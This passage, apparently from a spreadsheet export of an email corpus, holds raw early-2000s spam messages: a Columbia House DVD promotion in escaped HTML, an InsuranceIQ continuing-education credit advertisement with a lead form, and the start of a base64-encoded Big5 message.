 	&lt;td width="94" valign="top"&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;img HEIGHT="140" WIDTH="100" src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/content/art/dvd/cover/02/69/026993_dba_dtl_01.jpg" align="left" hspace="2" vspace="2" border=0 alt="Click for Detail"&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="35"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td width="94" valign="top"&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;img HEIGHT="140" WIDTH="100" src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/content/art/dvd/cover/02/70/027035_dba_dtl_01.jpg" align="left" hspace="2" vspace="2" border=0 alt="Click for Detail"&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="35"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td width="94" valign="top"&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;img HEIGHT="140" WIDTH="100" src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/content/art/dvd/cover/02/52/025208_dba_dtl_01.jpg" align="left" hspace="2" vspace="2" border=0 alt="Click for Detail"&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#6666cc" width="10" colspan="2"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="10" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td bgcolor="#ffffff" width="491" valign="top"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="491" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td bgcolor="#6666cc" width="10" colspan="2"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="10" height="1" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="501" bgcolor="#ffffff"&gt;
 &lt;tr&gt;&lt;td width="20"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td width="94" valign="top"&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font size="-2" face="verdana, arial, sans-serif" color="#000000"&gt;&lt;B&gt;Ocean's 11&lt;/B&gt;&lt;/font&gt;&lt;/a&gt;&lt;BR&gt;&lt;font size="-2" face="verdana, arial, sans-serif" color="#000000"&gt;Starring &lt;B&gt;George Clooney, Brad Pitt, Matt Damon&lt;/B&gt;&lt;/font&gt;&lt;/td&gt;
 	&lt;td width="64"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td width="94" valign="top"&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font size="-2" face="verdana, arial, sans-serif" color="#000000"&gt;&lt;B&gt;Harry Potter and the Sorcerer's Stone&lt;/B&gt;&lt;/font&gt;&lt;/a&gt;&lt;BR&gt;&lt;font size="-2" face="verdana, arial, sans-serif" color="#000000"&gt;Starring &lt;B&gt;Daniel Radcliffe, Rupert Grint, Emma Watson &lt;/B&gt;&lt;/font&gt;&lt;/td&gt;
 	&lt;td width="62"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td width="94" valign="top"&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font size="-2" face="verdana, arial, sans-serif" color="#000000"&gt;&lt;B&gt;Gladiator&lt;/B&gt;&lt;/font&gt;&lt;/a&gt;&lt;BR&gt;&lt;font size="-2" face="verdana, arial, sans-serif" color="#000000"&gt;Starring &lt;B&gt;Russell Crowe, Joaquin Phoenix&lt;/B&gt;&lt;/font&gt;&lt;/td&gt;
 	&lt;td width="33"&gt;&amp;nbsp;&lt;/td&gt;&lt;/font&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;!--End Selection of the Month--&gt;
 &lt;!--New Releases--&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="511" bgcolor="#ffffff"&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#ffffff"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="227" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td align="right"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/se2/email/online_ad/left_curve_new.gif" width="6" height="15" alt=""&gt;&lt;/td&gt;
 &lt;td bgcolor="#6666cc" width="215" align="center"&gt;&lt;font size="-2" face="verdana, arial, sans-serif" color="#ffffff"&gt;&lt;B&gt;MORE TITLES&lt;/B&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td align="left"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/se2/email/online_ad/right_curve_new.gif" width="6" height="15" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="511" bgcolor="#ffffff"&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#6666cc" rowspan="2"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="1" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#6666cc"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="9" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td width="491" bgcolor="#6666cc"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="491" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#6666cc"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="9" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td bgcolor="#6666cc" rowspan="2"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="1" height="1" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="3"&gt;
 	&lt;table cellpadding="10" cellspacing="0" border="0" width="511" bgcolor="#ffffff"&gt;
 	&lt;tr&gt;
 	&lt;td colspan="3"&gt;&lt;font size="-2" face="verdana, arial, sans-serif"&gt;Choose from these many more hot releases at chdvd.com!&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 	&lt;td valign="top"&gt;
 		&lt;table cellpadding="10" cellspacing="0" border="0" width="120" bgcolor="#ffffff"&gt;
 		&lt;tr&gt;
 		&lt;td&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;img HEIGHT="140" WIDTH="100" src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/content/art/dvd/cover/02/70/027094_dba_dtl_01.jpg" align="left" hspace="2" vspace="2" border=0 alt="Click for Detail"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;td valign="top"&gt;&lt;font size="-2" face="verdana, arial, sans-serif" &gt;
 			&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;The Others&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Training Day&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Pearl Harbor (2001) 60th Anniversary Commemorative Edition&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Moulin Rouge (2001)&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Braveheart&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;
 		&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 		&lt;td&gt;&amp;nbsp;&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;/td&gt;
 	&lt;td valign="top"&gt;
 		&lt;table cellpadding="10" cellspacing="0" border="0" width="120" bgcolor="#ffffff"&gt;
 		&lt;tr&gt;
 		&lt;td&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;img HEIGHT="140" WIDTH="100" src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/content/art/dvd/cover/02/64/026476_dba_dtl_01.jpg" align="left" hspace="2" vspace="2" border=0 alt="Click for Detail"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;td valign="top"&gt;&lt;font size="-2" face="verdana, arial, sans-serif"&gt;
 			&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Shrek Special Edition&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Spy Game&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;American Pie 2 Collector's Edition (Unrated)&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Gone In 60 Seconds &lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;The Green Mile&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;
 		&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 		&lt;td&gt;&lt;font size="-2" face="verdana, arial, sans-serif"&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;More Hits&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;
 		&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;/td&gt;
 	&lt;td valign="top"&gt;
 		&lt;table cellpadding="10" cellspacing="0" border="0" width="120" bgcolor="#ffffff"&gt;
 		&lt;tr&gt;
 		&lt;td&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;img HEIGHT="140" WIDTH="100" src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/content/art/dvd/cover/02/62/026224_dba_dtl_01.jpg" align="left" hspace="2" vspace="2" border=0 alt="Click for Detail"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;td valign="top"&gt;&lt;font size="-2" face="verdana, arial, sans-serif"&gt;
 			&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Matrix&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Fast and the Furious (2001) Collector's Edition&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Serendipity&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Titanic&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 	&lt;BR&gt;&lt;BR&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;font color="#000000"&gt;&lt;b&gt;Saving Private Ryan Special Limited Edition&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;
 		&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 		&lt;td&gt;&amp;nbsp;&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#6666cc" width="10" colspan="2"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="10" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td bgcolor="#ffffff" width="491" valign="top"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="491" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td bgcolor="#6666cc" width="10" colspan="2"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="10" height="1" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;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src="http://www.salealerts.com/dot.gif" width=1 border=0&gt;
 &lt;/TD&gt;
     &lt;TD vAlign=top&gt;&lt;I&gt;&lt;/I&gt;&lt;FONT face=Verdana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href="http://www.frugaljoe.com/unsubscribe.php?eid=\~moc.cnietonten^^mj\~1754388\~12a1"&gt;here &lt;/a&gt;or
 cut and paste the following link into a web browser:&lt;br&gt;
  http://www.frugaljoe.com/unsubscribe.php?eid=\~moc.cnietonten^^mj\~1754388\~12a1
 &lt;br&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;IMG height=20
 src="http://www.salealerts.com/dot.gif" 
       width=459 border=0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 &lt;img src="http://www.330w.com/open/open.php?eid=zzzz@example.com&amp;oid=DVD-09242002-HTML&amp;custid=frugaljoe" border=0 height=0 width=0&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Save 84% on CE Credits
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_3257B2_01C249FA.18BC9920
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Save 84% on C.E. Credits &amp; Pre-Licensing Courses
  State CE, CLU, CFP, CPA and Securities
  Unlimited courses &amp; credits for 24 months
  Regular Price:$1298, IQ Price:$199	
 *	No Hidden Fees
 *	Over 16,000 Credits
 *	Over 300 Courses
 *	90% Internet Based
 *	High Quality Courses
 *	Unlimited Access
 Complete this form for a FREE Guest Demo!	 
 Name:	 	 
 E-mail:	 	 
 Phone:	 	 
 City:	 	 State:	 	  	
 We don't want anybody to receive our mailing who does not wish to
 receive them. To be removed from this mailing list, DO NOT REPLY to this
 message. Instead, go here: http://www.InsuranceIQ.com/optout
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;  
 ------=_NextPart_000_3257B2_01C249FA.18BC9920
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Save 84% on CE Credits&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;p align=3D"center"&gt;
   &lt;table width=3D"557" border=3D"3" cellspacing=3D"0" cellpadding=3D"0" =
 bordercolor=3D"003399" height=3D"709"&gt;
     &lt;tr&gt;
       &lt;td height=3D"703" align=3D"center"&gt;=20
           &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
             &lt;tr&gt;=20
               &lt;td align=3D'center'&gt;
                 &lt;img src=3D"http://iiq.us/images/iqcamp/header2.gif" =
 width=3D"550" height=3D"128" alt=3D'Save 84% on C.E. Credits &amp; =
 Pre-Licensing Courses'&gt;&lt;br&gt;
                 &lt;img src=3D"http://iiq.us/images/iqcamp/images.jpg" =
 width=3D"550" height=3D"121"&gt;&lt;br&gt;
                 &lt;img src=3D"http://iiq.us/images/iqcamp/tag2.gif" =
 width=3D"550" height=3D"130" alt=3D'State CE, CLU, CFP, CPA and =
 Securities'&gt;&lt;br&gt;
                 &lt;img src=3D"http://iiq.us/images/iqcamp/24_months.gif" =
 width=3D"235" height=3D"86" alt=3D'Unlimited courses &amp; credits for 24 =
 months'&gt;&lt;br&gt;
                 &lt;img src=3D"http://iiq.us/images/iqcamp/price2.gif" =
 width=3D"550" height=3D"42" alt=3D'Regular Price:$1298, IQ Price:$199'&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
             &lt;tr&gt;=20
               &lt;td align=3D"center"&gt;=20
                 &lt;table width=3D"480" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
                   &lt;tr&gt;=20
                     &lt;td width=3D"242"&gt;=20
                       &lt;b&gt;&lt;font size=3D"2" face=3D"Verdana, Arial, =
 Helvetica, sans-serif"&gt;
                       &lt;ul&gt;
                           &lt;li&gt;No Hidden Fees&lt;/li&gt;
                           &lt;li&gt;Over 16,000 Credits&lt;/li&gt;
                           &lt;li&gt;Over 300 Courses&lt;/li&gt;
                       &lt;/ul&gt;
                       &lt;/font&gt;&lt;/b&gt;
                     &lt;/td&gt;
                     &lt;td width=3D"269"&gt;=20
                       &lt;b&gt;&lt;font size=3D"2" face=3D"Verdana, Arial, =
 Helvetica, sans-serif"&gt;
                       &lt;ul&gt;
                           &lt;li&gt;90% Internet Based&lt;/li&gt;
                           &lt;li&gt;High Quality Courses&lt;/li&gt;
                           &lt;li&gt;Unlimited Access&lt;/li&gt;
                       &lt;/ul&gt;
                       &lt;/font&gt;&lt;/b&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                 &lt;/table&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
             &lt;tr&gt;=20
               &lt;td height=3D"136" align=3D"center"&gt;
                   &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
                     &lt;tr&gt;=20
                       &lt;td&gt;=20
                         &lt;table width=3D"100%" bgcolor=3D"#FFFFFF"&gt;
                           &lt;tr&gt;=20
                             &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                               &lt;td&gt;=20
                                 &lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"2" align=3D"center" =
 bgcolor=3D"#ffffff"&gt;
                                   &lt;tr bgcolor=3D"003399"&gt;=20
                                     &lt;td colspan=3D"5" =
 align=3D"center"&gt;&lt;font size=3D"2" face=3D"Verdana, Arial, Helvetica, =
 sans-serif" color=3D"#FFFFFF"&gt;&lt;b&gt;Complete this form for a FREE Guest =
 Demo!&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                                   &lt;/tr&gt;
                                   &lt;tr&gt;=20
                                     &lt;td width=3D"20%" =
 align=3D"right"&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;Name:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                                     &lt;td colspan=3D"4"&gt;&lt;input =
 type=3D"text" name=3D"contactname" size=3D"50"&gt;&lt;/td&gt;
                                   &lt;/tr&gt;
                                   &lt;tr&gt;=20
                                     &lt;td width=3D"20%" =
 align=3D"right"&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;E-mail:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                                     &lt;td colspan=3D"4"&gt;&lt;input =
 type=3D"text" name=3D"email" size=3D"50"&gt;&lt;/td&gt;
                                   &lt;/tr&gt;
                                   &lt;tr&gt;=20
                                     &lt;td width=3D"20%" =
 align=3D"right"&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;Phone:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                                     &lt;td colspan=3D"4"&gt;&lt;input =
 type=3D"text" name=3D"phone" size=3D"50"&gt;&lt;/td&gt;
                                   &lt;/tr&gt;
                                   &lt;tr&gt;=20
                                     &lt;td width=3D"20%" =
 align=3D"right"&gt;&lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif"&gt;&lt;b&gt;City:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                                     &lt;td width=3D"25%"&gt;&lt;input =
 type=3D"text" name=3D"city" size=3D"20"&gt;&lt;/td&gt;
                                     &lt;td width=3D"15%" =
 align=3D"right"&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;State:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                                     &lt;td width=3D"20%"&gt;&lt;input =
 type=3D"text" name=3D"state" size=3D"2"&gt;&lt;/td&gt;
                                     &lt;td rowspan=3D"2" align=3D"center" =
 valign=3D"middle" width=3D"20%"&gt;&lt;img src=3D"http://iiq.us/images/q2.gif" =
 width=3D"43" height=3D"50"&gt;&lt;/td&gt;
                                   &lt;/tr&gt;
                                   &lt;tr&gt;=20
                                     &lt;td width=3D"20%" =
 align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                                     &lt;td width=3D"25%" colspan=3D'3'&gt;=20
                                       &lt;input type=3D"submit" =
 name=3D"btnsubmit" value=3D"Submit"&gt;
                                       &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"iqcampus@insiq.com"&gt;
                                       &lt;input type=3D"hidden" =
 name=3D"hdnSuccessPageTxt" value=3D"http://insiq.financialcampus.com"&gt;
                                       &lt;input type=3D"hidden" =
 name=3D"hdnSubjectTxt" value=3D"IQ Campus Inquiry"&gt;
                                     &lt;/td&gt;
                                   &lt;/tr&gt;
                                 &lt;/table&gt;
                               &lt;/td&gt;
                             &lt;input type=3D'hidden' name=3D'SentTo' =
 value=3D'304704'&gt;
 &lt;/form&gt;
                           &lt;/tr&gt;
                         &lt;/table&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                   &lt;img src=3D"http://iiq.us/images/iqcamp/logo.gif" =
 width=3D"286" height=3D"65"&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"1" color=3D"#000000"&gt;We=20
           don't want anybody to receive our mailing who does not wish to =
 receive=20
           them. To be removed from this mailing list, DO NOT REPLY to =
 this message.=20
           Instead, go here: &lt;a =
 href=3D"http://www.InsuranceIQ.com/optout"&gt;http://www.InsuranceIQ.com/opt=
 out&lt;/a&gt;&lt;br&gt;
           &lt;a href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal =
 Notice&lt;/a&gt;&lt;/font&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_3257B2_01C249FA.18BC9920--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?big5?Q?=B3=D0=B7~=C2=E0=B7~=A4u=C5=AA=B7s=A6=E6=B7~=B6W=B0=D3=B3s=C2=EA=A5[=B7=F9?=
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_GimEwuvgROJ8eFyeYA6Wmjd9wbYV6
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_GimEwuvgROJ8eFyeYA6Wmjd9wbYV6AA"
 ------=_NextPart_GimEwuvgROJ8eFyeYA6Wmjd9wbYV6AA
 Content-Type: text/html;
 	charset="big5"
 Content-Transfer-Encoding: base64
 PGh0bWwgeG1sbnM6dj0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp2bWwiDQp4bWxuczpvPSJ1
 cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOm9mZmljZTpvZmZpY2UiDQp4bWxuczp3PSJ1cm46c2No
 ZW1hcy1taWNyb3NvZnQtY29tOm9mZmljZTp3b3JkIg0KeG1sbnM9Imh0dHA6Ly93d3cudzMub3Jn
 L1RSL1JFQy1odG1sNDAiPg0KDQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9Q29udGVudC1UeXBl
 IGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1CaWc1Ij4NCjxtZXRhIG5hbWU9UHJvZ0lkIGNv
 bnRlbnQ9V29yZC5Eb2N1bWVudD4NCjxtZXRhIG5hbWU9R2VuZXJhdG9yIGNvbnRlbnQ9Ik1pY3Jv
 c29mdCBXb3JkIDkiPg0KPG1ldGEgbmFtZT1PcmlnaW5hdG9yIGNvbnRlbnQ9Ik1pY3Jvc29mdCBX
 b3JkIDkiPg0KPGxpbmsgcmVsPUZpbGUtTGlzdCBocmVmPSIuL7xzp2mrSC5maWxlcy9maWxlbGlz
 dC54bWwiPg0KPHRpdGxlPrnvpKOwXyBePC90aXRsZT4NCjwhLS1baWYgZ3RlIG1zbyA5XT48eG1s
 Pg0KIDxvOkRvY3VtZW50UHJvcGVydGllcz4NCiAgPG86QXV0aG9yPkFBQTwvbzpBdXRob3I+DQog
 IDxvOlRlbXBsYXRlPk5vcm1hbDwvbzpUZW1wbGF0ZT4NCiAgPG86TGFzdEF1dGhvcj5BQUE8L286
 TGFzdEF1dGhvcj4NCiAgPG86UmV2aXNpb24+MTE8L286UmV2aXNpb24+DQogIDxvOlRvdGFsVGlt
 ZT4xMTwvbzpUb3RhbFRpbWU+DQogIDxvOkNyZWF0ZWQ+MjAwMi0wNy0xMFQxNzoxNjowMFo8L286
 Q3JlYXRlZD4NCiAgPG86TGFzdFNhdmVkPjIwMDItMDctMTJUMDQ6NTA6MDBaPC9vOkxhc3RTYXZl
 ZD4NCiAgPG86UGFnZXM+MTwvbzpQYWdlcz4NCiAgPG86V29yZHM+MTY8L286V29yZHM+DQogIDxv
 OkNoYXJhY3RlcnM+OTM8L286Q2hhcmFjdGVycz4NCiAgPG86TGluZXM+MTwvbzpMaW5lcz4NCiAg
 PG86UGFyYWdyYXBocz4xPC9vOlBhcmFncmFwaHM+DQogIDxvOkNoYXJhY3RlcnNXaXRoU3BhY2Vz
 PjExNDwvbzpDaGFyYWN0ZXJzV2l0aFNwYWNlcz4NCiAgPG86VmVyc2lvbj45LjI4MTI8L286VmVy
 c2lvbj4NCiA8L286RG9jdW1lbnRQcm9wZXJ0aWVzPg0KPC94bWw+PCFbZW5kaWZdLS0+PCEtLVtp
 ZiBndGUgbXNvIDldPjx4bWw+DQogPHc6V29yZERvY3VtZW50Pg0KICA8dzpQdW5jdHVhdGlvbktl
 cm5pbmcvPg0KICA8dzpEaXNwbGF5SG9yaXpvbnRhbERyYXdpbmdHcmlkRXZlcnk+MDwvdzpEaXNw
 bGF5SG9yaXpvbnRhbERyYXdpbmdHcmlkRXZlcnk+DQogIDx3OkRpc3BsYXlWZXJ0aWNhbERyYXdp
 bmdHcmlkRXZlcnk+MjwvdzpEaXNwbGF5VmVydGljYWxEcmF3aW5nR3JpZEV2ZXJ5Pg0KICA8dzpD
 b21wYXRpYmlsaXR5Pg0KICAgPHc6U3BhY2VGb3JVTC8+DQogICA8dzpCYWxhbmNlU2luZ2xlQnl0
 ZURvdWJsZUJ5dGVXaWR0aC8+DQogICA8dzpEb05vdExlYXZlQmFja3NsYXNoQWxvbmUvPg0KICAg
 PHc6VUxUcmFpbFNwYWNlLz4NCiAgIDx3OkRvTm90RXhwYW5kU2hpZnRSZXR1cm4vPg0KICAgPHc6
